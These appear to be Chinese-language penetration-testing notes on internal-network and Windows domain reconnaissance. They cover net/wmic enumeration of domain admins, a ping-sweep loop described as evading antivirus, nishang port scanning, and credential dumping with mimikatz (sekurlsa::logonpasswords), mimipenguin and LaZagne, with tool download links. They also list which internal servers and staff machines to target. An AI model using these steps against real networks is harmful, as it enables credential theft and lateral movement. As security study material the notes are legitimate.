在局域网里,范围小的计算机 可操作ARP欺骗,DNS劫持等等。
1.2 DMZ两个防火墙之间的空间
1.3 域环境存在一台主机管理计算机。大部门都是windows,也有linux。LINUX下需要安装LDAP环境,功能上没有windows域强大,用linux管理技术人员门槛比较高。
1.4 域控制器DC域里的管理者,域的最高权限。
1.5 活动目录AD网络基本概况
systeminfo 详细信息
net start 启动服务
tasklist 进程列表
schtasks 计划任务 #遇到加载不出来的情况可能时权限不够
2.2 网络信息收集了解当前服务器的网络接口信息,判断当前角色、功能等等
ipconfig /all 当前所在域
net view /domain 判断存在域
net time /domain 判断主域
使用Ping命令或者nslookup得到域控ip地址
netstat -ano 查看网络端口开放 2.3 用户信息收集
系统默认常见用户身份: Domain Admins 域管理员(默认对域控制器有完全控制权) Enterprise Admins 企业系统管理员用户(默认对域控制器有完全控制权) Domain Computers 域内机器 Domain Controllers 域控制器 Domain Guest 域访客、权限低 Domain Users 域用户
相关命令:
net user 本地用户
net user /domain 查看域用户
目前是域用户webadmin,当访问计算机管理时需要输入账号密码进行验证。当是本地用户如Administrator时,可直接进入,二者有区别。
net localgroup 查看本地组
net group /domain 查看域的组
wmic useraccount get /all 涉及域用户详细信息
net group “Domain Admins” /domain 查村域管理员账户
net group “Enterprise Admins” /domain 查询管理员用户组
收集各种密文,明文,口令等,为后续横向渗透测试准备。
2.4.1 用户HASH,明文获取mimikatz(windows) mimipenguin(linux)
mimikatz mimipenguin 下载链接 https://github.com/samratashok/nishang https://github.com/AlessandroZ/LaZagne https://github.com/gentilkiwi/mimikatz/releases https://github.com/huntergregal/mimipenguin/releases/ https://nagareshwar.securityxploded.com/download-softwares/ https://xenarmor.com/allinone-password-recovery-pro-software/ https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug提取码: taqu
以mimikatz为例,需要在本地管理组下操作
必须去验证密码,否则无法查看密码
打开REAIME.md文件 ,查看命令
privilege::debug #启动命令 sekurlsa::logonpasswords #查看用户密码
以mimipenguin为例,基本上支持ubuntu
./mimipenguin.sh #获取明文密码,root权限
LaZagne(all)所有系统均适用
XenArmor(win) 有钱直接买,大概2,300
1.站点源码备份文件、数据库备份文件等
2.各类数据库web管理入口,如PHPMYAdmin
3.浏览器保存密码、浏览器cookies
4.其他用户会话、3389和ipc$连接记录、回收站内容
5.windows保存的WIFI密码
6.网络内部的各种账号和密码,如Email、VPN、OA等
LaZagne下载地址 https://github.com/AlessanfroZ/LaZagne2.5 探针主机域控架构服务
探针域控制器名及地址信息
net time /domain nelookup ping
探针域内存活主机地址信息
nbtscan 192.168.3.0/24第三方工具
系统自带命令
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL="
不会被杀毒软件拦截
nmap masscan 第三方PowerShell脚本nishang empire等
import-Module .nishang.psml #导入nishang模块 Set-ExecutionPolicy RemoteSigned #设置执行策略,初次运行需执行 Get-Command -Module nishang #获取模块 nishang 的命令函数 Get-Information #获取常规计算机信息 Invoke-PortScan -StartAddress 192.168.229.0 -EndAddress 192.168.229.255 -ResolveHost -ScanPort #端口扫描(查看目录对应文件有演示语法,其他同理) #其他功能:删除补丁,反弹 Shell,凭据获取等2.6 探针域内主机角色及服务信息
利用开放端口服务及计算机名判断
核心业务机器:
1.高级管理人员、系统管理员、财务/人事/业务人员的个人计算机
2.产品管理系统服务器
3.办公系统服务器
4.财务应用系统服务器
5.核心产品源码服务器(自建SVN、GIT)
6.数据库服务器
7.文件或网盘服务器、共享服务器
8.电子邮件服务器
9.网络监控系统服务器
10.其他服务器(内部技术文档服务器、其他监控服务器等)
